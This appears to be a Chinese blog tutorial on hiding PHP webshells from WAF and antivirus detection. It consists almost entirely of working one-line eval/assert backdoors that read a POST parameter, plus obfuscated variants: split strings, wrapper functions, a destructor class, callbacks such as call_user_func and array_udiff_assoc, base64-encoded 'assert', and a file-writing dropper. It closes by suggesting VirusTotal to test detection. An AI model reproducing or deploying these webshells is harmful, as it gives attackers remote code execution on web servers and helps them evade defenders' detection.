共计 1170 个字符,预计需要花费 3 分钟才能阅读完成。
1. 动态免杀(assert.eval)
| <?php | |
| eval($_POST['haha']); | |
| ?> |
| <?php | |
| assert($_POST['haha']); | |
| ?> |
暗藏关键字(waf 检测到 assert,eval 这个关键词,很大概率会被检测进去,那么咱们能够尝试用别的词来生成,具体的生成形式有很多种,这里列举一下常见的几种形式,其实成果都差不多。)
- 1 拆解合并
| <?php | |
| $a = "a"."s"; | |
| $b = "e"."r"."t"; | |
| $c = $a.$b; | |
| $c($_POST['haha']); | |
| ?> |
| <?php | |
| function fun1($a){$a($_POST['haha']); | |
| } | |
| fun1(assert); | |
| ?> |
| <?php | |
| function fun1($a){assert($a); | |
| } | |
| fun1($_POST['haha']); | |
| ?> |
| <?php | |
| class me{ | |
| public $a = ''; | |
| function __destruct() | |
| {assert("$this->a"); | |
| } | |
| } | |
| $obj = new me; | |
| $obj->a = $_POST['haha']; | |
| ?> |
- 2 调用函数(利用各种函数如 array_map、array_key、preg_replace、@call_user_func、substr_replace 来暗藏关键字)
| <?php | |
| @call_user_func(assert,$_POST['haha']); | |
| ?> |
| <?php | |
| $a = substr_replace("assexx","rt",4); | |
| $a($_POST['haha']); | |
| ?> |
| <?php | |
| $a = $_REQUEST['haha']; | |
| $b = "\n"; | |
| ?> |
| <?php | |
| function fun(){return $_POST['haha']; | |
| } | |
| @preg_replace("/nihao/e",fun(),"nihao woshi zj"); | |
| ?> |
| <?php | |
| if(isset($_POST['file'])){ | |
| $d = 'data'; | |
| $$d = $_POST['haha'];//$data | |
| $f = 'fp'; | |
| $$f = fopen($_POST['file'],'wb');//$fp | |
| echo fwrite($fp,$data)?'save success':'save fail'; | |
| fclose($fp); | |
| } | |
| ?> |
- 3 编码
| <?php | |
| $a = base64_decode("YXNzZXJ0"); | |
| $a($_POST['haha']); | |
| ?> |
- 4 冷门回调函数 array_uintersect_uassoc 函数来回调 assert
| <?php | |
| $password = "LandGrey"; | |
| array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); | |
| ?> |
用该网站 https://www.virustotal.com/ 测试
正文完
